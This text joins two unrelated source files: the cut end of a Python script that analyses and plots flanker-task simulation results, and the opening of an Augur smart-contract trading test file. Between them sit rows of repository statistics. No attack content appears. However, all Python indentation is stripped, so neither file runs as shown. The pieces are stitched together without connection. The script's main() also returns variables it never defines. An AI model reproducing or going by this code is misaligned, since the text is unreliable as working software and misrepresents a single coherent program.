sns.lineplot(x='prev_cong', y='RT', data=data.query('tendencies==@tendency and uncertainty==@unc and trial_num>0 and binned_RT<=@cutoff'), style='congruent', hue='trans_probs', ci = 95, estimator=np.nanmean, linewidth=3)
#plt.ylim([200,1000])
plt.show()
plt.figure()
plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
sns.lineplot(x='prev_cong', y='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and trial_num>0 and binned_RT<=@cutoff'), style='congruent', hue='uncertainty', ci = 95, estimator=np.nanmean, linewidth=3)
#plt.ylim([200,1000])
plt.show()
# plt.figure()
# sns.lineplot(x='num_in_run', y='RT', data=data.query('congruent == 1 and trial_num > 50'), ci = 95, estimator=np.nanmedian, linewidth=3)
# sns.lineplot(x='num_in_run', y='RT', data=data.query('congruent == 0 and trial_num > 50'), ci = 95, estimator=np.nanmedian, linewidth=3)
# plt.show()
return data, bin_size
def analyze_flanker_knockout(folder):
tendencies = [1]#[1,10,25,50,75,100, 250,1000]#1,10,100,100
probs = [90]
uncertainties = [0.2]#,15,20]
run_name = "flanker_alpha_h"+str(int(tendencies[0]))+"_t"+str(probs[0])+"_u"+str(uncertainties[0])+"_f3.5_ut0.99_priorknockout.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
print(len(worlds_old))
repetitions = len(worlds_old)
trials = worlds_old[0].trials
num_types = len(tendencies)*len(probs)*len(uncertainties)
correct = np.zeros(repetitions*trials*num_types)
RT = np.zeros(repetitions*trials*num_types)
agent = np.zeros(repetitions*trials*num_types)
congruent = np.zeros(repetitions*trials*num_types)
trial_num = np.zeros(repetitions*trials*num_types)
epoch = np.zeros(repetitions*trials*num_types)
tend_arr = np.zeros(repetitions*trials*num_types)
prob_arr = np.zeros(repetitions*trials*num_types)
unc_arr = np.zeros(repetitions*trials*num_types)
binned_RT = np.zeros(repetitions*trials*num_types)
prev_congruent = np.zeros(repetitions*trials*num_types) - 1
non_dec_time = 100
bin_size = 250
t_s = 0.2
sim_type = 0
for tendency in tendencies:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
for trans in probs:#[100,99,98,97,96,95,94]:
for unc in uncertainties:
print(tendency, trans, unc)
run_name = "flanker_alpha_h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f3.5_ut0.99_priorknockout.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
repetitions = len(worlds_old)
trials = worlds_old[0].trials
offset = sim_type*repetitions*trials
for i in range(repetitions):
w = worlds_old[i]
correct[offset+i*trials:offset+(i+1)*trials] = (w.actions[:,0] == w.environment.correct_choice).astype(int)
RT[offset+i*trials:offset+(i+1)*trials] = t_s*w.agent.action_selection.RT[:,0] + non_dec_time
agent[offset+i*trials:offset+(i+1)*trials] = i
congruent[offset+i*trials:offset+(i+1)*trials] = np.logical_not(w.environment.congruent)
trial_num[offset+i*trials:offset+(i+1)*trials] = np.arange(0,trials)
epoch[offset+i*trials:offset+(i+1)*trials] = [-1]*10 + [0]*20 + [1]*20 + [2]*20 + [3]*(trials-70)
tend_arr[offset+i*trials:offset+(i+1)*trials] = tendency
prob_arr[offset+i*trials:offset+(i+1)*trials] = trans
unc_arr[offset+i*trials:offset+(i+1)*trials] = unc#/100
binned_RT[offset+i*trials:offset+(i+1)*trials] = t_s*(bin_size//2 + bin_size*(w.agent.action_selection.RT[:,0]//bin_size)) +non_dec_time
prev_congruent[offset+i*trials:offset+(i+1)*trials][1:] = congruent[offset+i*trials:offset+(i+1)*trials][:-1]
sim_type+=1
data_dict = {"correct": correct, "RT": RT, "agent": agent,
"congruent": congruent, "binned_RT": binned_RT,
"trial_num": trial_num, "epoch": epoch,
"uncertainty": unc_arr, "tendencies": tend_arr,
"trans_probs": prob_arr, "prev_cong": prev_congruent}
data = pd.DataFrame(data_dict)
# plt.figure()
# for i in range(0,3):
# sns.lineplot(x='num_in_run', y='RT', data=data.query('epoch == @i'), style='congruent', label=str(i), ci = 95, estimator=np.nanmean, linewidth=3)
# plt.show()
tendency=1
trans=90
unc=0.2
cutoff = non_dec_time + 800#non_dec_time + 500#5000#2*500
# accuracy
plt.figure()
#plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
plt.title("priorknockout")
sns.lineplot(x='binned_RT', y='correct', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and binned_RT<=@cutoff'), style='congruent', ci = 95, estimator=np.nanmean, linewidth=3)
#plt.plot([0+bin_size,cutoff-bin_size], [0.5,0.5], '--', color='grey', alpha=0.5)
#plt.ylim([0,1.05])
plt.yticks(fontsize=16)
plt.xticks(fontsize=16)
plt.xlabel("RT", fontsize=16)
plt.ylabel("Prop correct", fontsize=16)
plt.savefig("accuracy_priorknockout.svg")
plt.show()
# gratton
plt.figure(figsize=(4,5))
palette = [(0,0,0), (0,0,0)]
#plt.title("tendency "+str(tendency)+", trans "+str(100trans)+", unc "+str(unc))
plt.title("priorknockout")
sns.lineplot(x='prev_cong', y='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and trial_num>0'), style='congruent', hue='congruent', ci = 95, estimator=np.nanmean, linewidth=3, markers=True, markersize=12, palette=palette)
#plt.ylim([200,1000])
plt.xticks([0,1], labels=["CON", "INC"], fontsize=16)
plt.yticks(fontsize=16)
plt.xlim([-0.25,1.25])
plt.ylim([0,800])
plt.xlabel("Previous trial type", fontsize=16)
plt.ylabel("RT", fontsize=16)
plt.savefig("gratton_priorknockout.svg")
plt.show()
tendencies = [100]#[1,10,25,50,75,100, 250,1000]#1,10,100,100
probs = [90]
uncertainties = [0.2]#,15,20]
run_name = "flanker_alpha_h"+str(int(tendencies[0]))+"_t"+str(probs[0])+"_u"+str(uncertainties[0])+"_f3.5_ut0.99_learningknockout.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
print(len(worlds_old))
repetitions = len(worlds_old)
trials = worlds_old[0].trials
num_types = len(tendencies)*len(probs)*len(uncertainties)
correct = np.zeros(repetitions*trials*num_types)
RT = np.zeros(repetitions*trials*num_types)
agent = np.zeros(repetitions*trials*num_types)
congruent = np.zeros(repetitions*trials*num_types)
trial_num = np.zeros(repetitions*trials*num_types)
epoch = np.zeros(repetitions*trials*num_types)
tend_arr = np.zeros(repetitions*trials*num_types)
prob_arr = np.zeros(repetitions*trials*num_types)
unc_arr = np.zeros(repetitions*trials*num_types)
binned_RT = np.zeros(repetitions*trials*num_types)
prev_congruent = np.zeros(repetitions*trials*num_types) - 1
non_dec_time = 100
bin_size = 250
t_s = 0.2
sim_type = 0
for tendency in tendencies:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
for trans in probs:#[100,99,98,97,96,95,94]:
for unc in uncertainties:
print(tendency, trans, unc)
run_name = "flanker_alpha_h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f3.5_ut0.99_learningknockout.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
repetitions = len(worlds_old)
trials = worlds_old[0].trials
offset = sim_type*repetitions*trials
for i in range(repetitions):
w = worlds_old[i]
correct[offset+i*trials:offset+(i+1)*trials] = (w.actions[:,0] == w.environment.correct_choice).astype(int)
RT[offset+i*trials:offset+(i+1)*trials] = t_s*w.agent.action_selection.RT[:,0] + non_dec_time
agent[offset+i*trials:offset+(i+1)*trials] = i
congruent[offset+i*trials:offset+(i+1)*trials] = np.logical_not(w.environment.congruent)
trial_num[offset+i*trials:offset+(i+1)*trials] = np.arange(0,trials)
epoch[offset+i*trials:offset+(i+1)*trials] = [-1]*10 + [0]*20 + [1]*20 + [2]*20 + [3]*(trials-70)
tend_arr[offset+i*trials:offset+(i+1)*trials] = tendency
prob_arr[offset+i*trials:offset+(i+1)*trials] = trans
unc_arr[offset+i*trials:offset+(i+1)*trials] = unc#/100
binned_RT[offset+i*trials:offset+(i+1)*trials] = t_s*(bin_size//2 + bin_size*(w.agent.action_selection.RT[:,0]//bin_size)) +non_dec_time
prev_congruent[offset+i*trials:offset+(i+1)*trials][1:] = congruent[offset+i*trials:offset+(i+1)*trials][:-1]
sim_type+=1
data_dict = {"correct": correct, "RT": RT, "agent": agent,
"congruent": congruent, "binned_RT": binned_RT,
"trial_num": trial_num, "epoch": epoch,
"uncertainty": unc_arr, "tendencies": tend_arr,
"trans_probs": prob_arr, "prev_cong": prev_congruent}
data = pd.DataFrame(data_dict)
# plt.figure()
# for i in range(0,3):
# sns.lineplot(x='num_in_run', y='RT', data=data.query('epoch == @i'), style='congruent', label=str(i), ci = 95, estimator=np.nanmean, linewidth=3)
# plt.show()
tendency=100
trans=90
unc=0.2
cutoff = non_dec_time + 500#5000#2*500
# accuracy
plt.figure()
#plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
plt.title("learningknockout")
sns.lineplot(x='binned_RT', y='correct', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and binned_RT<=@cutoff'), style='congruent', ci = 95, estimator=np.nanmean, linewidth=3)
#plt.plot([0+bin_size,cutoff-bin_size], [0.5,0.5], '--', color='grey', alpha=0.5)
#plt.ylim([0,1.05])
plt.yticks(fontsize=16)
plt.xticks(fontsize=16)
plt.xlabel("RT", fontsize=16)
plt.ylabel("Prop correct", fontsize=16)
plt.savefig("accuracy_learningknockout.svg")
plt.show()
# gratton
plt.figure(figsize=(4,5))
palette = [(0,0,0), (0,0,0)]
#plt.title("tendency "+str(tendency)+", trans "+str(100trans)+", unc "+str(unc))
plt.title("learningknockout")
sns.lineplot(x='prev_cong', y='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and trial_num>0'), style='congruent', hue='congruent', ci = 95, estimator=np.nanmean, linewidth=3, markers=True, markersize=12, palette=palette)
#plt.ylim([200,1000])
plt.xticks([0,1], labels=["CON", "INC"], fontsize=16)
plt.yticks(fontsize=16)
plt.xlim([-0.25,1.25])
plt.ylim([0,800])
plt.xlabel("Previous trial type", fontsize=16)
plt.ylabel("RT", fontsize=16)
plt.savefig("gratton_learningknockout.svg")
plt.show()
tendencies = [1]#[1,10,25,50,75,100, 250,1000]#1,10,100,100
probs = [90]
uncertainties = [0.2]#,15,20]
run_name = "flanker_alpha_h"+str(int(tendencies[0]))+"_t"+str(probs[0])+"_u"+str(uncertainties[0])+"_f3.5_ut0.99_contextknockout.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
print(len(worlds_old))
repetitions = len(worlds_old)
trials = worlds_old[0].trials
num_types = len(tendencies)*len(probs)*len(uncertainties)
correct = np.zeros(repetitions*trials*num_types)
RT = np.zeros(repetitions*trials*num_types)
agent = np.zeros(repetitions*trials*num_types)
congruent = np.zeros(repetitions*trials*num_types)
trial_num = np.zeros(repetitions*trials*num_types)
epoch = np.zeros(repetitions*trials*num_types)
tend_arr = np.zeros(repetitions*trials*num_types)
prob_arr = np.zeros(repetitions*trials*num_types)
unc_arr = np.zeros(repetitions*trials*num_types)
binned_RT = np.zeros(repetitions*trials*num_types)
prev_congruent = np.zeros(repetitions*trials*num_types) - 1
non_dec_time = 100
bin_size = 250
t_s = 0.2
sim_type = 0
for tendency in tendencies:#,3,5,10,30,50,100]: #1,2,3,4,5,6,7,8,9,10,20,30,40,50,60,70,80,90,100]:
for trans in probs:#[100,99,98,97,96,95,94]:
for unc in uncertainties:
print(tendency, trans, unc)
run_name = "flanker_alpha_h"+str(int(tendency))+"_t"+str(trans)+"_u"+str(unc)+"_f3.5_ut0.99_contextknockout.json"
fname = os.path.join(folder, run_name)
jsonpickle_numpy.register_handlers()
with open(fname, 'r') as infile:
data = json.load(infile)
worlds_old = pickle.decode(data)
repetitions = len(worlds_old)
trials = worlds_old[0].trials
offset = sim_type*repetitions*trials
for i in range(repetitions):
w = worlds_old[i]
correct[offset+i*trials:offset+(i+1)*trials] = (w.actions[:,0] == w.environment.correct_choice).astype(int)
RT[offset+i*trials:offset+(i+1)*trials] = t_s*w.agent.action_selection.RT[:,0] + non_dec_time
agent[offset+i*trials:offset+(i+1)*trials] = i
congruent[offset+i*trials:offset+(i+1)*trials] = np.logical_not(w.environment.congruent)
trial_num[offset+i*trials:offset+(i+1)*trials] = np.arange(0,trials)
epoch[offset+i*trials:offset+(i+1)*trials] = [-1]*10 + [0]*20 + [1]*20 + [2]*20 + [3]*(trials-70)
tend_arr[offset+i*trials:offset+(i+1)*trials] = tendency
prob_arr[offset+i*trials:offset+(i+1)*trials] = trans
unc_arr[offset+i*trials:offset+(i+1)*trials] = unc#/100
binned_RT[offset+i*trials:offset+(i+1)*trials] = t_s*(bin_size//2 + bin_size*(w.agent.action_selection.RT[:,0]//bin_size)) +non_dec_time
prev_congruent[offset+i*trials:offset+(i+1)*trials][1:] = congruent[offset+i*trials:offset+(i+1)*trials][:-1]
sim_type+=1
data_dict = {"correct": correct, "RT": RT, "agent": agent,
"congruent": congruent, "binned_RT": binned_RT,
"trial_num": trial_num, "epoch": epoch,
"uncertainty": unc_arr, "tendencies": tend_arr,
"trans_probs": prob_arr, "prev_cong": prev_congruent}
data = pd.DataFrame(data_dict)
# plt.figure()
# for i in range(0,3):
# sns.lineplot(x='num_in_run', y='RT', data=data.query('epoch == @i'), style='congruent', label=str(i), ci = 95, estimator=np.nanmean, linewidth=3)
# plt.show()
tendency=1
trans=90
unc=0.2
cutoff = non_dec_time + 500#5000#2*500
# accuracy
plt.figure()
#plt.title("tendency "+str(tendency)+", trans "+str(trans)+", unc "+str(unc))
plt.title("contextknockout")
sns.lineplot(x='binned_RT', y='correct', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and binned_RT<=@cutoff'), style='congruent', ci = 95, estimator=np.nanmean, linewidth=3)
#plt.plot([0+bin_size,cutoff-bin_size], [0.5,0.5], '--', color='grey', alpha=0.5)
#plt.ylim([0,1.05])
plt.yticks(fontsize=16)
plt.xticks(fontsize=16)
plt.xlabel("RT", fontsize=16)
plt.ylabel("Prop correct", fontsize=16)
plt.savefig("accuracy_contextknockout.svg")
plt.show()
# gratton
plt.figure(figsize=(4,5))
palette = [(0,0,0), (0,0,0)]
#plt.title("tendency "+str(tendency)+", trans "+str(100trans)+", unc "+str(unc))
plt.title("contextknockout")
sns.lineplot(x='prev_cong', y='RT', data=data.query('tendencies==@tendency and trans_probs==@trans and uncertainty==@unc and trial_num>0'), style='congruent', hue='congruent', ci = 95, estimator=np.nanmean, linewidth=3, markers=True, markersize=12, palette=palette)
#plt.ylim([200,1000])
plt.xticks([0,1], labels=["CON", "INC"], fontsize=16)
plt.yticks(fontsize=16)
plt.xlim([-0.25,1.25])
plt.ylim([0,800])
plt.xlabel("Previous trial type", fontsize=16)
plt.ylabel("RT", fontsize=16)
plt.savefig("gratton_contextknockout.svg")
plt.show()
def main():
"""
set parameters
"""
folder = "data"
if not os.path.isdir(folder):
os.mkdir(folder)
repetitions = 50
"""
run simulations
"""
# runs simulations with varying habitual tendency and reward probability
# results are stored in data folder
#run_flanker_simulations(repetitions, folder)
#run_learningknockout_flanker_simulations(repetitions, folder)
#run_priorknockout_flanker_simulations(repetitions, folder)
#run_contextknockout_flanker_simulations(repetitions, folder)
#data, bin_size = analyze_flanker_simulations(folder)
analyze_flanker_knockout(folder)
return data, bin_size
if __name__ == "__main__":
data, bin_size = main()
| 44.100082
| 269
| 0.548309
| 6,951
| 53,758
| 4.107323
| 0.0551
| 0.023538
| 0.023538
| 0.031944
| 0.877828
| 0.872504
| 0.863257
| 0.863257
| 0.862137
| 0.857443
| 0
| 0.052404
| 0.294319
| 53,758
| 1,219
| 270
| 44.100082
| 0.700179
| 0.18481
| 0
| 0.821935
| 0
| 0
| 0.083922
| 0.01665
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010323
| false
| 0
| 0.028387
| 0
| 0.042581
| 0.076129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e12f8184b465d91e85c249274350443bba8de7a
| 48,996
|
py
|
Python
|
packages/augur-core/tests/trading/test_trade.py
|
6paklata/augur
|
cb9b0ae8c2be129229e687efdef80aa8d1f5b5d6
|
[
"MIT"
] | null | null | null |
packages/augur-core/tests/trading/test_trade.py
|
6paklata/augur
|
cb9b0ae8c2be129229e687efdef80aa8d1f5b5d6
|
[
"MIT"
] | null | null | null |
packages/augur-core/tests/trading/test_trade.py
|
6paklata/augur
|
cb9b0ae8c2be129229e687efdef80aa8d1f5b5d6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from eth_tester.exceptions import TransactionFailed
from utils import longTo32Bytes, longToHexString, fix, AssertLog, stringToBytes, EtherDelta, PrintGasUsed, BuyWithCash, TokenDelta, nullAddress
from constants import ASK, BID, YES, NO, LONG, SHORT
from pytest import raises, mark
from reporting_utils import proceedToNextRound
from decimal import Decimal
@mark.parametrize('withSelf', [
True,
False
])
def test_one_bid_on_books_buy_full_order(withSelf, contractsFixture, cash, market, universe):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
# create order
sender = contractsFixture.accounts[2] if withSelf else contractsFixture.accounts[1]
with BuyWithCash(cash, fix('2', '60'), sender, "create order"):
orderID = createOrder.publicCreateOrder(BID, fix(2), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = sender)
# fill best order
orderEventLog = {
"eventType": 2,
"addressData": [contractsFixture.accounts[2] if withSelf else contractsFixture.accounts[1] , contractsFixture.accounts[2]],
"uint256Data": [60, 0, YES, 0, 0, 0, fix(2), contractsFixture.contracts['Time'].getTimestamp(), 0, 0],
}
with BuyWithCash(cash, fix('2', '40'), contractsFixture.accounts[2], "fill order"):
with AssertLog(contractsFixture, "OrderEvent", orderEventLog):
assert trade.publicTrade(SHORT,market.address, YES, fix(2), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender=contractsFixture.accounts[2])
assert orders.getAmount(orderID) == 0
assert orders.getPrice(orderID) == 0
assert orders.getOrderCreator(orderID) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID) == 0
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
@mark.parametrize('afterMkrShutdown', [
True,
False
])
def test_one_bid_on_books_buy_partial_order(afterMkrShutdown, contractsFixture, cash, market):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
fillOrder = contractsFixture.contracts['FillOrder']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
if (afterMkrShutdown):
contractsFixture.MKRShutdown()
# create order
with BuyWithCash(cash, fix('2', '60'), contractsFixture.accounts[1], "create order"):
orderID = createOrder.publicCreateOrder(BID, fix(2), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# fill best order
fillOrderID = None
orderEventLog = {
"eventType": 2,
"addressData": [contractsFixture.accounts[1], contractsFixture.accounts[2]],
"uint256Data": [60, fix(1), YES, 0, 0, 0, fix(1), contractsFixture.contracts['Time'].getTimestamp(), 0, fix(1, 60)],
}
with BuyWithCash(cash, fix('1', '40'), contractsFixture.accounts[2], "trade"):
with AssertLog(contractsFixture, "OrderEvent", orderEventLog):
with PrintGasUsed(contractsFixture, "publicTrade", 0):
fillOrderID = trade.publicTrade(1, market.address, YES, fix(1), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])
assert orders.getAmount(orderID) == fix(1)
assert orders.getPrice(orderID) == 60
assert orders.getOrderCreator(orderID) == contractsFixture.accounts[1]
assert orders.getOrderMoneyEscrowed(orderID) == fix('1', '60')
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
assert fillOrderID == longTo32Bytes(1)
def test_one_bid_on_books_buy_partial_order_fill_loop_limit(contractsFixture, cash, market, universe):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
# create order
with BuyWithCash(cash, fix('2', '60'), contractsFixture.accounts[1], "trade 1"):
orderID = createOrder.publicCreateOrder(BID, fix(2), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# fill best order
orderEventLog = {
"eventType": 2,
"addressData": [contractsFixture.accounts[1], contractsFixture.accounts[2]],
"uint256Data": [60, fix(1), YES, 0, 0, 0, fix(1), contractsFixture.contracts['Time'].getTimestamp(), 0, fix(1, 60)],
}
with BuyWithCash(cash, fix('1', '40'), contractsFixture.accounts[2], "trade 2"):
with AssertLog(contractsFixture, "OrderEvent", orderEventLog):
with PrintGasUsed(contractsFixture, "publicTrade", 0):
fillOrderID = trade.publicTrade(1, market.address, YES, fix(1), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender=contractsFixture.accounts[2])
assert orders.getAmount(orderID) == fix(1)
assert orders.getPrice(orderID) == 60
assert orders.getOrderCreator(orderID) == contractsFixture.accounts[1]
assert orders.getOrderMoneyEscrowed(orderID) == fix('1', '60')
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
assert fillOrderID == longTo32Bytes(1)
def test_one_bid_on_books_buy_excess_order(contractsFixture, cash, market, universe):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
fillOrder = contractsFixture.contracts['FillOrder']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
# create order
with BuyWithCash(cash, fix('4', '60'), contractsFixture.accounts[1], "create order"):
orderID = createOrder.publicCreateOrder(BID, fix(4), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# fill best order
orderFilledEventLog = {
"eventType": 2,
"addressData": [contractsFixture.accounts[1], contractsFixture.accounts[2]],
"uint256Data": [60, 0, YES, 0, 0, 0, fix(4), contractsFixture.contracts['Time'].getTimestamp(), 0, 0],
}
orderCreatedEventLog = {
"eventType": 0,
"addressData": [contractsFixture.accounts[2], nullAddress],
"uint256Data": [60, fix(1), YES, 0, 0, 0, 0, contractsFixture.contracts['Time'].getTimestamp(), 0, fix(1, 40)],
}
with AssertLog(contractsFixture, "OrderEvent", orderFilledEventLog):
with AssertLog(contractsFixture, "OrderEvent", orderCreatedEventLog, skip=1):
with BuyWithCash(cash, fix('5', '40'), contractsFixture.accounts[2], "trade"):
fillOrderID = trade.publicTrade(SHORT,market.address, YES, fix(5), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender=contractsFixture.accounts[2])
assert orders.getAmount(orderID) == 0
assert orders.getPrice(orderID) == 0
assert orders.getOrderCreator(orderID) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID) == 0
assert orders.getOrderSharesEscrowed(orderID) == 0
assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
assert orders.getAmount(fillOrderID) == fix(1)
assert orders.getPrice(fillOrderID) == 60
assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[2]
assert orders.getOrderMoneyEscrowed(fillOrderID) == fix('1', '40')
assert orders.getOrderSharesEscrowed(fillOrderID) == 0
assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
def test_two_bids_on_books_buy_both(contractsFixture, cash, market):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
# create order 1
with BuyWithCash(cash, fix('4', '60'), contractsFixture.accounts[1], "create order"):
orderID1 = createOrder.publicCreateOrder(BID, fix(4), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# create order 2
with BuyWithCash(cash, fix('1', '60'), contractsFixture.accounts[3], "create order"):
orderID2 = createOrder.publicCreateOrder(BID, fix(1), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[3])
# fill best order
with PrintGasUsed(contractsFixture, "Fill two", 0):
with BuyWithCash(cash, fix('5', '40'), contractsFixture.accounts[2], "fill best orders"):
fillOrderID = trade.publicTrade(SHORT,market.address, YES, fix(5), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])
assert orders.getAmount(orderID1) == 0
assert orders.getPrice(orderID1) == 0
assert orders.getOrderCreator(orderID1) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID1) == 0
assert orders.getOrderSharesEscrowed(orderID1) == 0
assert orders.getBetterOrderId(orderID1) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID1) == longTo32Bytes(0)
assert orders.getAmount(orderID2) == 0
assert orders.getPrice(orderID2) == 0
assert orders.getOrderCreator(orderID2) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID2) == 0
assert orders.getOrderSharesEscrowed(orderID2) == 0
assert orders.getBetterOrderId(orderID2) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID2) == longTo32Bytes(0)
assert fillOrderID == longTo32Bytes(1)
def test_two_bids_on_books_buy_one_with_limit(contractsFixture, cash, market, universe):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
fillOrder = contractsFixture.contracts['FillOrder']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
with BuyWithCash(cash, fix('4', '60'), contractsFixture.accounts[1], "create order 1"):
orderID1 = createOrder.publicCreateOrder(BID, fix(4), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
with BuyWithCash(cash, fix('1', '60'), contractsFixture.accounts[3], "create order 2"):
orderID2 = createOrder.publicCreateOrder(BID, fix(1), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[3])
# fill best order
with PrintGasUsed(contractsFixture, "Fill two", 0):
with BuyWithCash(cash, fix('4', '40'), contractsFixture.accounts[2], "buy complete set"):
fillOrderID = trade.publicTrade(SHORT,market.address, YES, fix(5), 60, "0", "0", tradeGroupID, 1, longTo32Bytes(11), sender = contractsFixture.accounts[2])
assert orders.getAmount(orderID1) == 0
assert orders.getPrice(orderID1) == 0
assert orders.getOrderCreator(orderID1) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID1) == 0
assert orders.getOrderSharesEscrowed(orderID1) == 0
assert orders.getBetterOrderId(orderID1) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID1) == longTo32Bytes(0)
assert orders.getAmount(orderID2) == fix(1)
# We dont create an order since an existing match is on the books
assert fillOrderID == longTo32Bytes(1)
def test_two_bids_on_books_buy_full_and_partial(contractsFixture, cash, market, universe):
createOrder = contractsFixture.contracts['CreateOrder']
trade = contractsFixture.contracts['Trade']
fillOrder = contractsFixture.contracts['FillOrder']
orders = contractsFixture.contracts['Orders']
tradeGroupID = longTo32Bytes(42)
# create order 1
with BuyWithCash(cash, fix('12', '60'), contractsFixture.accounts[1], "create order"):
orderID1 = createOrder.publicCreateOrder(BID, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
# create order 2
with BuyWithCash(cash, fix('7', '60'), contractsFixture.accounts[3], "create order"):
orderID2 = createOrder.publicCreateOrder(BID, fix(7), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[3])
# fill best order
with BuyWithCash(cash, fix('15', '40'), contractsFixture.accounts[2], "trade"):
fillOrderID = trade.publicTrade(SHORT,market.address, YES, fix(15), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])
assert orders.getAmount(orderID1) == 0
assert orders.getPrice(orderID1) == 0
assert orders.getOrderCreator(orderID1) == longToHexString(0)
assert orders.getOrderMoneyEscrowed(orderID1) == 0
assert orders.getOrderSharesEscrowed(orderID1) == 0
assert orders.getBetterOrderId(orderID1) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID1) == longTo32Bytes(0)
assert orders.getAmount(orderID2) == fix(4)
assert orders.getPrice(orderID2) == 60
assert orders.getOrderCreator(orderID2) == contractsFixture.accounts[3]
assert orders.getOrderMoneyEscrowed(orderID2) == fix('4', '60')
assert orders.getOrderSharesEscrowed(orderID2) == 0
assert orders.getBetterOrderId(orderID2) == longTo32Bytes(0)
assert orders.getWorseOrderId(orderID2) == longTo32Bytes(0)
